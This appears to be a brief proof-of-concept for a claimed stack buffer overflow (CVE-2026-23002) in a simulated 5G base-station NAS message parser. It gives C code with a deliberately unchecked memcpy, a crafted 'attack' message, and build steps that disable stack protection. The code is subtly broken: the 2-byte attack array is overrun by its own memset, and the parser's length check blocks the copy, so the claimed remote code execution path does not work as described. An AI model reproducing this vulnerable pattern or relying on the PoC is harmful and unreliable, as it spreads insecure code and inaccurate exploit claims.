
Simulated 5G gNodeB NAS parser with stack buffer overflow PoC for CVE-2026-23002; a crafted NAS message triggers remote code execution.
// gnb_nas_sim.c - Simulated 5G gNodeB parsing NAS Registration Request
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#define MAX_IE_SIZE 128
void process_registration_request(uint8_t *nas_msg, uint16_t length) {
uint8_t ie_buffer[MAX_IE_SIZE];
// Read IE length from message; if length > MAX_IE_SIZE, buffer overflow
uint16_t ie_length = (nas_msg[0] << 8) | nas_msg[1];
if (ie_length > 0 && ie_length <= length - 2) {
memcpy(ie_buffer, nas_msg + 2, ie_length); // no bounds check!
printf("IE copied, size %d\n", ie_length);
}
}
int main() {
// Craft a NAS message with an oversized IE length
uint8_t attack[] = {0x01, 0x00}; // IE length = 256, but buffer is only 128 bytes
// Append padding to make length consistent
memset(attack+2, 'A', 254);
process_registration_request(attack, sizeof(attack));
return 0;
}
The 5G Non‑Access Stratum (NAS) parser in a simulated gNodeB fails to validate the Information Element length field. An attacker sending a crafted Registration Request can overflow a stack buffer, leading to remote code execution on the base station.
Compile and run the vulnerable parser:
gcc -o gnb_nas_sim gnb_nas_sim.c -fno-stack-protector
./gnb_nas_sim
The program crashes with a segmentation fault (stack corruption).